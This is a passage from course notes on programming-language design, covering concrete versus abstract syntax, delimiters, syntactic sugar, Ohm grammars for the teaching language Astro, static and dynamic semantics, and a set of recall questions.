    ObjectPattern properties:[AssignmentProperty|RestElement]
    ArrayPattern elements:[Pattern?]
    RestElement argument:Pattern
    AssignmentPattern left:Pattern right:Expression
Super
TemplateElement tail:boolean value:{cooked:string? raw:string}
ChainElement optional:boolean
enum UnaryOperator {"-"|"+"|"!"|"~"|"typeof"|"void"|"delete"}
enum UpdateOperator {"++"|"--"}
enum BinaryOperator {"=="|"!="|"==="|"!=="|"<"|"<="|">"|">="|"<<"|">>"|">>>"|"+"|"-"|"*"|"/"|"%"|"**"|"|"|"^"|"&"|"in"|"instanceof"}
enum AssignmentOperator {"="|"+="|"-="|"*="|"/="|"%="|"**="|"<<="|">>="|">>>="|"|="|"^="|"&="}
enum LogicalOperator {"||"|"&&"|"??"}
ModuleDeclaration
    ImportDeclaration specifiers:[ImportSpecifier|ImportDefaultSpecifier|ImportNamespaceSpecifier] source:Literal
    ExportNamedDeclaration declaration:Declaration? specifiers:[ExportSpecifier] source:Literal?
    ExportDefaultDeclaration declaration:(Declaration|Expression)
    ExportAllDeclaration source:Literal exported:(Identifier?)
ModuleSpecifier local:Identifier
    ImportSpecifier imported:Identifier
    ImportDefaultSpecifier
    ImportNamespaceSpecifier
    ExportSpecifier exported:Identifier

I’ve built an interactive application for you to explore AST generation. Please try it out! .

Exercise : Please try it out.

Too much detail?

You may notice that the EsTree specification has a lot more detail than the hand-drawn ASTs in the video above. This is okay. The specification is used to build actual compilers and interpreters, while for hand-drawn ASTs we just like to give the big picture and can take some “shortcuts.”

From Abstract Syntax to Concrete Syntax

Now it’s time to think about what your language will really look like! Remember that design is creative and iterative, so you will want to begin, like all artists do, with sketches:

  • Sketch programs or program fragments in your language.
  • Sketch fragments that are not in your language.
  • Come up with a nice, consistent, syntactic theme.

Do a lot of experimentation here! You will probably want to put creative effort into designing languages people like to use! What kind of syntax issues do they deal with? Dozens, actually, and we can’t cover them all. But how about a taste of just a few. We’ll peek at just a few issues that sometimes generate strong opinions.

Overall Phrase Structure

You will need to adopt a scheme for showing structure. The popular approaches are: Curly-brace (JavaScript, Java, C++, C#), Terminal-end (Ruby, Ada), Nested parentheses (Lisp, Clojure, Racket), Indentation (Python), Blocks (EToys, Scratch, Snap!), Pictures (Piet), Other (Haskell, Erlang, Prolog).

The important idea here is that a single abstract syntax can be realized with many different concrete syntaxes . A concrete syntax specifies exactly which strings of characters make up structurally valid programs. For example, the AST:

little-ast.png

represents each of the following (and more!):

while y - 5 == 3:
    print(x * (3 + y))
while y - 5 == 3 {
  print(x * (3 + y))
}
while y - 5 == 3 loop
  print(x * (3 + y))
end
(while (= (- y 5) 3)
    (print (* x (+ 3 y))))

Exercise : The last syntax is used in Clojure, Lisp, Scheme and others. Note that in some ways, this IS the abstract syntax. How so?

Exercise : Here is another: y 5 - 3 == [x 3 y + * print] while . Do you know of, or can you find, any languages which have that kind of syntax?

In addition to structure, your choice of keywords, operators, punctuation (or lack thereof) are part of your design. Here’s an abstract syntax:

ikiast.png

Let’s try out a few things:

program:
    var x, y: integer
    while y - 5 == 3:
        var y: integer
        get(x)
        get(y)
        x = 2 * (3 + y)
    put(5)
int x, y;
while y - 5 = 3 {
    int y;
    STDIN -> x;
    STDIN -> y;
    x <- 2 * (3 + y);
}
STDOUT <- 5;
COMMENT THIS LOOKS LIKE OLD CODE
DECLARE INT X.
DECLARE INT Y.
WHILE DIFFERENCE OF Y AND 5 IS 3 LOOP:
    DECLARE INT Y.
    READ FROM STDIN INTO X.
    READ FROM STDIN INTO Y.
    MOVE PRODUCT OF 2 AND (SUM OF 3 AND Y) INTO X.
END LOOP.
WRITE 5 TO STDOUT.
(program
  (declare x int)
  (declare y int)
  (while (= (- y 5) 3)
    (define (y int))
    (read x y)
    (assign x (* 2 (+ 3 y)))
  )
  (write 5)
)

Exercise : Play around and sketch a few more.

Delimiters

How to separate one construct from another is a really big issue in syntax design, believe it or not. We can identify two main classes of languages: those in which newlines are significant and those in which they are not.

“Insignificant” Newlines

In many languages, newlines are just like any other whitespace character (except for minor exceptions such as single-line comments and single-line string literals. Then, unless you have an S-Expression-based syntax as in LISP, Scheme, and Clojure, you’ll need semicolons to terminate (or separate) statements. This means you can (but shouldn’t) write code like:

#define ZERO 0
    unsigned  gcd(   unsigned   int  // Euclid's algorithm
      x,unsigned   y) {   while ( /* hello */  x>   ZERO
   ){unsigned temp=x;x=y   %x;y  = temp ;}return

   y ;}

“Significant” Newlines

Where you place your newlines matters greatly in, let’s see, Assembly languages, Python, Ruby, JavaScript, Elm, Haskell, Go, Swift, and yes, many others. The rules can get pretty technical.

Python scripts are defined as sequences of logical lines , delimited by the token NEWLINE. A statement may not cross logical lines, except in the case of compound statements in which each constituent simple statement ends with a NEWLINE. Logical lines are made up of one or more physical lines according to line joining rules. Lines are implicitly jointed within parentheses, brackets, or braces; lines can be explicitly joined by ending with a backslash. These rules are somewhat exclusive of comments and string literals.

Ruby looks at the end of each line and says “well if up to here it looks like we’ve completed a statement the we have.” This means you have to be careful where you break lines:

puts 5
  + 3
puts 5 +
  3

prints 5 then 8.

Exercise : Why?

“Possibly Significant” Newlines

JavaScript requires most statements to be terminated by semicolons, but the compiler will put one in for you if it looks like you might have missed one . The rules by which this automatic semicolon insertion (ASI) is done have to be learned and they might be hard to remember.

[God creating JavaScript]
GOD: It uses prototype-based inheritance.
Angel: Nice.
GOD: Also it secretly adds semicolons to ur code.
A: wat

— Neckbeard Hacker (@NeckbeardHacker) August 24, 2016

If you are going to be a serious JavaScript programmer, you need to learning the rules of ASI whether you choose to use semicolons or not .

Exercise : Research the famous Rules of Automatic Semicolon Insertion . Which statements are supposed to be terminated by a semicolon? When is a semicolon inserted? Give four examples of how writing JavaScript in a "free-form" manner is impossible because of semicolon insertion.

Some people feel very strongly whether to use or not to use semicolons:

zzzzing.png

Function Calls

Most programming languages have functions. Seriously. But there are a lot of ways to work them into your design. Basic questions include: Must functions have exactly one argument, or zero or more arguments? Parens or no parens? Positional or keyword arguments? Argument labels? If no arguments, can we omit parentheses?

You can play around and see what you can come up with:

  • push(myStack, 55)
  • push myStack 55
  • [push myStack 55]
  • (push myStack 55)
  • push(on: myStack, theValue: 55)
  • push(theValue: 55, on: myStack)
  • push on:myStack theValue:55
  • push({ on: myStack, theValue: 55 })
  • push { on: myStack, theValue: 55 }
  • push({ theValue: 55, on: myStack })

You might want to consider an ultra-low precedence function application, like they have in Haskell and F#:

  • sum (filter even (map square a))
  • sum $ filter even $ map square $ a
  • sum <| filter even <| map square <| a
  • a |> filter even |> map square |> sum

The flip side of function calls is function definitions. You’re likely familiar with default parameters, and rest parameters. Python has cool mechanisms for requiring arguments to be positional or keyword, based on the definition. Examples:

  • def sqrt(x, /)
  • def line(*, x1, x2, y1, y2, width, style, color)
  • def f(a, b, /, c, d, *, e, f)

Syntactic Sugar

Syntactic sugar refers to forms in a language that make certain things easier to express, but can be considered surface translations of more basic forms.

This is best understood by example. There are zillions of examples out there. Here are a few. ( Disclaimer : Some of these are just examples I made up and are not part of any real language.)

Construct Desugared Form Description
x += n x = x + n Compound assignment
a + b operator+(a, b) or
"+"(a, b) or
__add__(a, b)
Common in languages that allow overloading
a[i] *(a + i) (C, C++ pointer arithmetic) And i[a] works too!
p -> x (*p).x (C, C++) Field of struct being pointed to
f f() Some languages let you leave off parentheses in calls with no arguments
f x f(x) or
x.f()
Some languages let you leave off parentheses in calls with one argument
x op y op(x, y) or
x.op(y)
Some languages let you leave off parentheses in calls with two arguments
let x=E1 in E2 (x => E2)(E1) Let-expression (in functional languages)
(E1 ; E2) (() => E2)(E1) Expression sequencing (in eager functional languages)
r = [s
for x in a
if e]
r = []
for x in a:
if e:
r.add(s)
List comprehension
x orelse y if x then x else y (Standard ML) short-circuit disjunction
x andalso y if x then y else x (Standard ML) short-circuit conjunction
[x, y, z] x :: y :: z :: nil Lists in Standard ML
"a${x}b" "a" + x + "b" String interpolation

Exercise : Find some more examples.

When the sugared form is completely gratuitous or actually makes the code less readable, you sometimes hear the term syntactic syrup or syntactic saccharin .

Syntactic Salt

Here’s the definition from The New Hacker’s Dictionary :

The opposite of syntactic sugar, a feature designed to make it harder to write bad code. Specifically, syntactic salt is a hoop the programmer must jump through just to prove that he knows what’s going on, rather than to express a program action. Some programmers consider required type declarations to be syntactic salt. A requirement to write “ end if ”, “ end while ”, “ end do ”, etc. to terminate the last block controlled by a control construct (as opposed to just “ end ”) would definitely be syntactic salt. Syntactic salt is like the real thing in that it tends to raise hackers’ blood pressures in an unhealthy way.

Candygrammars

Some people love verbose code, because explicit is better than implicit. But if you are language designer, be pragmatic: there is such a thing as code that is too verbose. What about trying to make the code like human language? Here’s an example in Hypertalk (taken from Wikipedia):

on mouseDown
  answer file "Please select a text file to open."
  if it is empty then exit mouseDown
  put it into filePath
  if there is a file filePath then
    open file filePath
    read from file filePath until return
    put it into cd fld "some field"
    close file filePath
    set the textStyle of character 1 to 10 of card field "some field" to bold
  end if
end mouseDown

And here’s an example from a language that some students developed, and regretted:

to get the truth value prime of whole number n:
    return no if n < 2
    for each d in 3 to n - 1 by 2:
        return no if d divides n
    end
    return yes
end
for each k in 1 to 100:
    write k if prime(k)
end

In practice this kind of verbosity is worse than it sounds. Here’s what the New Hacker’s Dictionary has to say about this:

candygrammar /n./ A programming-language grammar that is mostly syntactic sugar; the term is also a play on “candygram.” COBOL, Apple’s Hypertalk language, and a lot of the so-called “4GL” database languages share this property. The usual intent of such designs is that they be as English-like as possible, on the theory that they will then be easier for unskilled people to program. This intention comes to grief on the reality that syntax isn’t what makes programming hard; it’s the mental effort and organization required to specify an algorithm precisely that costs. Thus the invariable result is that candygrammar languages are just as difficult to program in as terser ones, and far more painful for the experienced hacker.

[The overtones from the old Chevy Chase skit on Saturday Night Live should not be overlooked. This was a "Jaws" parody. Someone lurking outside an apartment door tries all kinds of bogus ways to get the occupant to open up, while ominous music plays in the background. The last attempt is a half-hearted "Candygram!" When the door is opened, a shark bursts in and chomps the poor occupant. There is a moral here for those attracted to candygrammars.]

Terseness

Some languages pride themselves on doing a whole lot with few characters:

An example from Ruby (do you see what this does?):

c = Hash.new 0
ARGF.each {|l| l.scan(/[A-Z']+/i).map {|w| c[w.downcase] += 1}}
c.keys.sort.each {|w| puts "#{w}, #{c[w]}"}

An example from APL (The 99 bottles of beer program taken from Rosetta Code):

bob  ←  { (⍕⍵), ' bottle', (1=⍵)↓'s of beer'}
bobw ←  {(bob ⍵) , ' on the wall'}
beer ←  { (bobw ⍵) , ', ', (bob ⍵) , '; take one down and pass it around, ', bobw ⍵-1}
↑beer¨ ⌽(1-⎕IO)+⍳99

Here’s APL again, with an expression to find all the prime numbers up to R:

(~R∊R∘.×R)/R←1↓⍳R

Some people love terse, concise code, because it says only what it needs and reduces the cognitive load, leaving you with less useless noisy syntax to learn. But if you are language designer, be pragmatic: there is such a thing as code that is too terse. Unless...that’s your goal....

Golfing Languages

Golfing languages take terseness to the next level. A golfing language is a kind of esoteric programming language (a non-practical language created to experiment with weird ideas, be hard to program in, or be humorous) that allows programs to be written in an insanely small number of characters (or bytes).

Here are some CJam programs:

  • "Hello, world!"
  • 5{"Hello, world"oNo}*
  • 0X{_2$+}A*]N*
  • l~@-@@-mh
  • 1{_B<}{_'**N+o)}w;

Here are some Pyth programs (taken from the documentation):

  • "Hello, world!
  • FNrZhTN
  • FNUhTN
  • VhTN
  • K1FNr1hQ=K*KN;K
  • .!Q
  • WtQ=Q?%Q2h*Q3/Q2Q
  • A(Z1;VhhTGA(H+GH

Exercise : Find a bunch more examples of CJam and Pyth programs. Try them out. You can run them both at TIO . For Pyth, there’s also a hosted interpreter with a Cheat Sheet .

Exercise : Try out Stax .

Defining Your Language

Traditionally, real world language definitions come in three main flavors:

  • An official document, with a mix of formal notation and informal descriptions (Very common)
  • An official document, with 100% of the definition specified in a formal notation (Very rare)
  • A “reference implementation,” namely a compiler or interpreter, so that the language “definition” is simply “whatever this program does” (Typical for some scripting languages). An advantage if this approach is that there are never any compiler bugs!

Exercise : Why exactly is a reference implementation compiler by definition bug-free? If being bug-free is so great, why don’t all languages do this? What are the downsides?

An official definition will have three parts:

Syntax (Structure) Semantics (Meaning)
Statics Dynamics
What are the structural entities (e.g., declarations, expressions, statements, modules) and how do they fit together, perhaps with punctuation? What are the non-structural rules that define a legal program (e.g., type checks, argument-parameter matching rules, visibility rules, etc.)? What does a program do? What effects do each of the forms of a well-structured, legal program have on the run-time environment?

Why are there three parts instead of two (i.e., just syntax and semantics)? Here’s why. While everyone might agree that the following is structurally malformed:

#<include > stdio.h
main() int }
    printf["Hello, world!\n");]
{

the following program looks good in terms of “structure” but it’s actually meaningless since it violates a contextual rule that says identifiers must be declared before use:

int main() {
    printf("%d\n", x);
}

We say the latter program has static semantic errors because they can be detected by a compiler before the program is ever run. This is in contrast to a dynamic semantic error, which can only be detected at run time.

Example : You’ve probably heard the distinction between “static” and “dynamic” before. Perhaps you know that “static typing” involves type checking is done prior to program execution and “dynamic typing” involves checking during program execution. Most languages do a little of both, but one or the other usually predominates. Sometimes you get a good deal of both: in TypeScript for example, you have a set of static types which is much larger and completely different than the eight dynamic types. Fun.

Defining the Syntax

Let‘s see how we would formally specify the syntax for the simple language Astro . Assume we’ve gone through the first two design phases, and we’ve sketched out a program that shows all the features:

// A simple program in Astro

radius = 55.2 * (-cos(2.8E-20) + 89) % 21;    // assignment statement
the_area = π * radius ** 2;                   // a built-in identifier
print hypot(2.28, 3 - radius) / the_area;     // print statement

Next, we put our ideas into words. A first pass: “Programs are structured as a sequence of one or more statements, each of which is an assignment or print statement, with expressions formed with numbers, variables, function calls, and the usual arithmetic operators, which can have parentheses when needed. Comments look like the slash-slash comments of C-like languages.”

Natural language isn’t super precise, so let’s try to tighten this up. Let’s get started defining programs, statements, and expressions:

Program     = Statement+
Statement   = id "=" Exp ";"
            | print Exp ";"
Exp         = numeral
            | id
            | id "(" (Exp ("," Exp)*)? ")" 
            | "-" Exp
            | Exp ("+" | "-" | "*" | "/" | "%" | "**") Exp
            | "(" Exp ")"

An identifier is the computer science word for a name you attach to an entity (a variable, constant, function, type, parameter, or similar thing). Let’s decree that Astro identifiers begin with a letter, and can have letters, digits, and underscores (examples: x , last_attempt , p1 , p2 , overTheLimit , bot8675309_jEnNy ). We will call letters, digits, and underscores identifier characters ( idchar s). But let’s also decree that print is not allowed to be an identifier (so we don’t confuse people)!

This means we have to carefully define the print keyword very carefully. It’s not just the five letters p, r, i, n, and t. If it were then the program:

    printy;

would be legal! It would be the five characters spelling print followed by a legal expression, namely the identifer $y$. We want the word print to not bleed into any following characters that might be part of an expression. In other words, print must not be immediately followed by an identifier character. And, we have to explicitly exclude print from our category of identifiers. Both things are necessary. Let’s use the ~ symbol in our notation to exclude things:

print       = "print" ~idchar
idchar      = letter | digit | "_"
id          = ~print letter idchar*

Exercise : Make sure you understand how this definition ensures that “printy” is an identifier and not print followed by the identifier y .

Now time for numerals. We’ll keep things in decimal only (no worries about hex or binary), and use the times-ten-to-the notation from popular programming languages:

numeral     = digit+ ("." digit+)? (("E" | "e") ("+" | "-")? digit+)?

Looking good. But what about things like letter and digit ? Should we define these? Nah, let’s say that in our definition schema that these things are built-in. Let’s in fact “build in” all of the following:

  • letter , for any Unicode letter
  • digit , for "0".."9"
  • alnum , for letter | digit
  • upper , for any Unicode uppercase letter
  • lower , for any Unicode lowercase letter
  • hexDigit , for digit | "a".."f" | "A".."F"
  • any , for any Unicode character at all

Lexical vs. Phrase Syntax

Did you notice that some of our syntax categories (Program, Statement, Exp) were capitalized and others (id, numeral, letter, digit) were not? Why did we do this?

The latter things are very primitive. They can not have internal spaces. We call these tokens . Think of these as basic “words”. The former, called phrases are more complex. Think of them as sentences. They are made up of tokens that can be separated by spaces . Tokens and phrases are very different, so we should denote them differently.

Exercise : Is capitalization a good convention for distinguishing tokens from phrases? Is it biased against languages that don’t distinguish capital and small letters?

So what are spaces—those characters that can separate tokens from each other? We’ll take them to be any Unicode space character. But we also want to separate tokens with comments. Let’s define how tokens should look in our language, and add them to the special space category:

space      += "//" (~"\n" any)*

Exercise : Explain why this reads as “a comment starts with two slashes and goes to the end of the line.”

Let’s take a deeper look into how the lexical and phrase syntaxes differ. As a specific example, this program:

  print( // ⿇🌿
420 );

is made up of these characters:

SPACE SPACE LATIN SMALL LETTER P LATIN SMALL LETTER R LATIN SMALL LETTER I LATIN SMALL LETTER N LATIN SMALL LETTER T LEFT PARENTHESIS TAB SOLIDUS SOLIDUS SPACE KANGXI RADICAL HEMP HERB LINEFEED DIGIT FOUR DIGIT TWO DIGIT ZERO SPACE RIGHT PARENTHESIS SEMICOLON

Following the lexical syntax, skipping the spaces (and comments), we get the token stream :

print ( num(420) ) ;

Following the phrase syntax, we can uncover the underlying parse tree :

420parsetree.png

A very important thing to note: The frontier of the parse tree is the token stream .

Exercise : Repeat this phrase to yourself five times: The frontier of the parse tree is the token stream.

The parse tree ends at tokens, not characters

Please take the time to consider how silly it would be if the parse tree expanded all of the lexical rules down to characters. Having the parse tree stop at tokens is a good example of what we would call “breaking a complex problem down into simpler parts.”

Another term for “parse tree” is concrete syntax tree (CST).

Ambiguity

How are we doing so far? We are able to distinguish well-structured Astro programs from all other Unicode strings. But there are some things we haven’t dealt with yet. For one, we have some strings with multiple structural forms. For example, the phrase 9-3*7 can be parsed in two ways:

ambiguity.png

Having more than one parse tree for a given input string means that our syntax description is ambiguous . It’s possible to handle this particular kind of ambiguity in the syntax. Here’s how.

Precedence

We can create rules that force certain operators to be applied before others; that is, the precedence of operators can be enforced in our syntax definition. To do so, we define additional syntactic categories. We say:

  • An expression is a sequence of one or more terms , separated by additive operators.
  • A term is a sequence of one or more factors , separated by multiplicative operators.
  • A factor is made up of primaries , separated by exponentiation operators, or a factor can just be a negated primary.
  • A primary is the most basic expression possible: either a simple identfier, a numeral, a call, or a parenthesized expression. Parentheses allow unlimited nesting.

So let’s revise our syntax specification:

Exp         = Term ( ("+" | "-") Term )*
Term        = Factor ( ("*" | "/" | "%") Factor )*
Factor      = Primary ( "**" Primary )*
            | "-" Primary
Primary     = numeral | id | id "(" (Exp ("," Exp)*)? ")" | "(" Exp ")"

Great! Now there is one and only one parse tree for that previously problematic expression:

nonambiguity.png

Note that the new syntax has forced the binary operators into a precedence hierarchy!

  • + and - have the lowest precedence.
  • * , / , and / have the next higher precedence.
  • ** has the highest precedence.

Of course, you can think of parenthesized expressions as being done before anything else, though we don’t usually think of these as operators.

Exercise : Precedence is usually a concept that applies only to binary operators, but they way in which unary operators mix with binary operators does need to be addressed. For instance, how should -3**2 be parsed? In Python exponentiation precedes negation, like -(3**2) . In Elm, negation precedes exponentiation, like (-3)**2 . Astro follows JavaScript and simply does not allow this expression (forcing programmers to use parentheses in this case)! Show how this is done.

Exercise : Our specification does not allow -3**2 as an expression, but it does allow -3+2 and -3*2 . Why did we care only enough to ensure negation did not mix with exponentiation, but we were fine with it mixing with addition and multiplication?

Associativity

Wait, we are not done with structuring our operators just yet. The way things stand now, the parse tree for 3-8-5 looks pretty flat:

flatexpression.png

It doesn’t suggest whether we mean to compute (3-8)-5 (which would be -10) or 3-(8-5) (which would be 0). We can give a syntax that makes this clear. In our design, let’s make the additive and multiplicative operators left-associative and the exponentiation operator right-associative :

Exp         = Exp ("+" | "-") Term
            | Term
Term        = Term ("*" | "/" | "%") Factor
            | Factor
Factor      = Primary "**" Factor
            | "-" Primary
            | Primary

How the heck does this work? Study these parse trees, and hopefully the insight will come to you! (Hint: remember the syntax is designed to force the tree to “come out” a certain way.

associativity.png

Exercise : Study this until you understand it well.

Grammars

The notation we’ve been using to precisely describe our syntax is a kind of a grammar . In fact, it is very close to a specific kind of grammar called an Ohm Grammar . Ohm requires a bit more ceremony than what we’ve been using so far. We’ll just jump right in and extend our work so far to a complete and working Ohm grammar:

astro.ohm

Astro {
  Program     = Statement+
  Statement   = id "=" Exp ";"                         --assignment
              | print Exp ";"                          --print
  Exp         = Exp ("+" | "-") Term                   --binary
              | Term
  Term        = Term ("*" | "/" | "%") Factor          --binary
              | Factor
  Factor      = Primary "**" Factor                    --binary
              | "-" Primary                            --negation
              | Primary
  Primary     = id "(" ListOf<Exp, ","> ")"            --call
              | numeral                                --num
              | id                                     --id
              | "(" Exp ")"                            --parens

  numeral     = digit+ ("." digit+)? (("E" | "e") ("+" | "-")? digit+)?
  print       = "print" ~idchar
  idchar      = letter | digit | "_"
  id          = ~print letter idchar*
  space      += "//" (~"\n" any)*                      --comment
}

When you are designing your language, you will build up your grammar iteratively, from increasingly more complex examples, and test the grammar as you go. Tools will help you here! If you are using Ohm, and you should, take advantage of the use the Ohm Editor . This is an amazing tool for experimenting with programming languages .

Ohm Editor Screenshot

In the upper left panel, design your grammar. You can load/save from your browser’s local storage, and even publish gists to GitHub. In the lower left panel, enter test cases: both tests you want to succeed (thumbs up) and those you want to fail (thumbs down). The right panel is an interactive concrete syntax tree for the currently selected test case.

This tool will save you a lot of time.

It is an essential component of your language design toolbox.

How essential is it?

Unless your language is trivial, tools like the Ohm Editor are very important! Design is an iterative process, and creativity is enabled and enhanced with immediate feedback. So you should design with tools that allow you to experiment and test your ideas.

That said, it is true that in practice, many production-level compilers do not use Ohm or related tools like ANTLR, Bison, etc.—they do everything by hand. But developers that go this route will write their grammar tests concurrently with their design.

CLASSWORK

Let’s do a code-along with the Ohm Editor for developing the Astro grammar. During the code-along, note how examples are done first, and note how we will evolve from the basics to more complex features, bringing in notions such as a precedence and associativity where needed.

During the code-along, bits of Ohm will be introduced as needed. In a subsequence course unit, we will cover Ohm in detail.

Defining the Statics

Question: Does the grammar we defined above for Astro capture the following (desirable) rule:

“You can only use an identifier if it has been previously assigned to.”

Answer: It does not.

Exercise : Show that it does not. Hint: Is print x; a legal program according to the grammar?

Exercise : Show how to capture the rule in a grammar. Hint: Do not be frustrated if you cannot.

Enforcing this rule requires knowledge of context . That is, the syntactic rule for producing expressions such as calls and arithmetic operations would need to somehow know which identifiers appeared on the left hand side of some previous assignment statement. This turns out to be so hard that even designers of real programming languages omit enforcement of contextual rules from the grammar! In fact, while the official grammar for Java will not derive this program:

class A {2 / == {{;

and report a syntax error , a Java compiler will say that this program:

class A {int x = y;}

is structurally well formed according to the official syntax of the Java language ! The compilation unit consists of a type declaration that is a class declaration whose body consists of a field declaration with a type, a name, and an initializing expression which is an identifier. But we know this program is not legal, since the identifier y has not been declared. It’s not only Java that has grammars overspecifying things: pretty much every programming language uses a grammar to define structural rules only, and specifies contextual rules in prose, or in a separate semantic definition.

For Astro, we will “define” the following contextual rules:

  1. The following identifiers are built-in:
    • π , a number
    • sqrt , a function of exactly one argument
    • sin , a function of exactly one argument
    • cos , a function of exactly one argument
    • hypot , a function of exactly two arguments
  2. An identifier cannot be used in an expression unless it is one of the built-in identifiers or has been previously assigned to.
  3. All function calls must accept the proper number of arguments.
  4. The built-in identifiers cannot be assigned to.
  5. Identifiers declared as functions can only be called, not used in any other context. Identifiers declared as numbers cannot be called.

For more complex languages, the statics definition (contextual rules) can be quite large. Here are some things that might appear:

  • Identifiers have to be declared before they are used.
  • Identifiers may not be used in a place where they may have not yet been initialized.
  • Identifier declarations must be unique within a scope, unless a language provides overloading.
  • All expressions must be used according to their type.
  • Identifiers must be used according to (1) their scope , (2) their access modifiers (private, protected, package, public, whitelist, blacklist, ...), and (3) any other meta-level attributes (enumerable, configurable, writable, deletable, callable, ...).
  • Arguments must match up with parameters in terms of number, order, name, mode, and type.
  • break and continue statements may only appear in a loop. return statements may only appear in a function it’s possible to encode these restrictions in the grammar, but it would be ugly).
  • All paths through a function must have a return.
  • All possible matches in a pattern match expression, or a switch statement, must be covered.
  • When inheriting from a base class with abstract methods, or implementing an interface, all abstract methods must be implemented, or the derived class must be declared abstract.
  • All declared local variables must be subsequently read, and declared private functions must be called.

Defining the Dynamics

The dynamics for most programming languages are given in prose. If you language is simple enough, a formal semantic definition is possible. For the sample languages in this course, Astro and Bella are given both informal and formal semantic definitions. We’ll not be studying formal semantics at this time, but feel free to study the definitions on your own.

Prototyping

During your language design, you will want to whip up a simple interpreter to at the very least make sure your design is reasonable. You may wish to developer your interpreter in parallel with your language design.

Ohm was designed for prototyping programming languages, so it is a natural choice. The Ohm Editor, as we just saw, helps you design the syntax. To write an actual interpreter, we’ll have to go much deeper into Ohm. We’ll be doing this in our next unit of study in this course, which is, indeed, a deep study of Ohm .

Examples

Many well-known programming languages have published, formal definitions. You can find them by searching the web.

For this class, we will be studying five little languages crafted especially to help you in your stufy of language design and implementation. We will be studying them in order, building upon previous languages and learning new things as we progress. This will allow us to introduce the huge topic of language processing in a practical setting, writing real compilers for real languages. The languages are Astro, Bella, Carlos, Dax, and Ekko.

Astro

Astro logo

We all begin as a white belt in every new endeavor. We will start, then, with a very simple, almost trivial, language. All it has are numbers, arithmetic operators, variables, and a few pre-defined constants and functions. Here’s an example program:

// A simple program in Astro
rAd1uS = 55.2 * (-cos(2.8E-20) + 89) % 21;
the_area = π * rAd1uS ** 2;
print(hypot(2.28, 3 - rAd1uS) / the_area);    // woohoo 👻

There are only two kinds of statements: assignments and print statements. Expressions include numbers, variables, function calls, arithmetic expressions with + , - , * , / , % , and ** , and can be parenthesized. We will cover the official definition of the language , and use the language to motivate a formal study of syntax.

When studying this language, we’ll learn about the separation of context-free syntax from contextual rules. Contextual rules include such things as: having to match the number of arguments in a call with the number of defined parameters, rudimentary type checking, and not allowing assignments to read-only variables.

As Astro will be our first language, we will use it as a case study to learn the amazing Ohm Language Library to build an interpreter . The details of how the interpreter is constructed are covered in the course notes on Ohm .

Bella

Bella logo

Our second language has a few things Astro does not: a richer set of operators, variable declarations, and user-defined functions. The contextual rules for Bella are much richer than that of Astro, since we now have actual declarations, and scope! Here’s an example program:

let dozen = 12;
print dozen % 3 ** 1;
function gcd(x, y) = y == 0 ? x : gcd(y, x % y);
while dozen >= 3 || (gcd(1, 10) != 5) {
  dozen = dozen - 2.75E+19 ** 1 ** 3;
}

We will first look at the official specification , introducing all sorts of interesting concepts. Then we’ll study a real, actual Bella compiler . Here we learn about designing and architecting a compiler, building the components (analyzer, optimizer, and generator), and getting 100% test coverage. The compiler source code is on GitHub .

Carlos

Carlos logo

In our third language, we encounter arrays, structs, and optionals: our first language that is basically useful. If you are taking the compiler course for which these notes were written, Carlos is a good example of the minimal language complexity you will need for your term project.

const languageName = "Carlos";

function greeting() {
  return random(["Welcome", "こんにちは", "Bienvenido"]);
}

print("👋👋👋");
repeat 5 {
  print(greeting() + " " + languageName);
}

We’ll be visiting the language’s official specification and a compiler on GitHub . The compiler (of course!) uses the Ohm Language Library.

There’s no separate page of notes describing the compiler. After studying the Astro and Bella compilers, you’ll be able to find your way around the code on GitHub (there’s documentation). And don’t worry, it’s development and usage will be covered in class, and the teaching staff can help you with any questions you might have.

Dax

Dax logo

Language number four is a functional language, that is, a language with no assignments! The only bindings of names to entities happens when passing arguments to parameters, though there is that famous let declaration which nicely sugars a function call: it’s nicer to say let x = 5 in x * y end than {x => x * y}(5) .

Here’s a sample program to get the feel for the language:

let
  gcd = {x => {y ==> y == 0 ? x : gcd y (x % y)}};
  z = 5
in
  [1, 3, z] |> filter {x => x > 2} |> map {x => x ** 2} |> print
  then
  "hello" |> substring 2 5 |> print
  then
  print (gcd 33 99)   // This is fine, you don't HAVE to use |>
end

If you have not yet seen languages with the awesome |> operator, here’s your chance to be wowed.

We will discuss the language design and compiler later in the course.

Ekko

Ekko logo

Our fifth language, Ekko (starting with E like Erlang and Elixir, which greatly influence it), is a kind of experimental language that deals quite a lot with time .

Ekko mixes styles of asynchronous programming from JavaScript and the distributed process-orientation of Erlang and Elixir: Ekko’s future objects are based on JS promises, and its processes communicate via messages as in Erlang. There’s also quite a bit more temporal goodness, including timeout calls, value histories with time travel (influenced by older versions of Elm), and even explicit parallelism.

More Examples

Students in previous iterations of the course have designed and implemented their own languages. Here’s a sampling of language over the past decade or so. (Please note that there is a very wide variety of quality in these examples. They are presented here without any evaluative commentary as to whether they are suitable building blocks for one’s own project.)

Recall Practice

Here are some questions useful for your spaced repetition learning. Many of the answers are not found on this page. Some will have popped up in lecture. Others will require you to do your own research.

  1. What are the four phases of programming language design?

    (1) Working out the desired context (audience, purpose, scope), (2) sketching example programs, (3) formalizing the syntax and semantics, and (4) prototyping.

  2. Name five programming language paradigms.

    A few are: imperative, declarative, structured, object-oriented, functional, applicative, concatenative, logic, protocol-oriented, aspect-oriented, array, event-driven, dataflow, agent-based. There are others

  3. What were the four big ideas in programming languages mentioned in Bret Victor’s Future of Programming talk?

    (1) Direct manipulation of data rather than showing the code, (2) Goals and constraints rather than procedures, (3) Spatial representation of code rather than textual representations, and (4) Concurrent computation rather than sequential

  4. What language did Alan Kay feature in his Programming Languages video?

    eToys

  5. What are some things to decide upon while undertaking language design?

    The audience, the purpose, the scope, the problem domain it is target to, whether it is reasonable or esoteric, whether it has a simple foundation or favors pragmatism, its concurrency model.

  6. In what essay did Bret Victor lay out several principles that languages and programming enviroments should follow to aid their users’ learning?

    Learnable Programming

  7. What is abstract syntax?

    The structure of a program without regard to the specific syntax used to represent it.

  8. What is the name of the specification of JavaScript’s abstract syntax?

    ESTree

  9. At what web address can you find and interactive JavaScript AST builder?

    https://rtoal.github.io/js-ast/

  10. What are five approaches of showing (concrete) syntactic structure in popular programming languages?

    Curly braces, indentation, terminal-ends, parentheses, postfix

  11. What is an example of a programming language for which newlines are significant?

    Answers include Python and Ruby

  12. What is syntactic sugar?

    Syntax within a programming language that is designed to make certain phrases more clear, concise, or elegant than the basic forms defined in the language.

  13. What is syntactic salt?

    Syntax within a programming language that is designed to make certain phrases more confusing, verbose, or awkward than the basic forms defined in the language.

  14. What is a candygrammar?

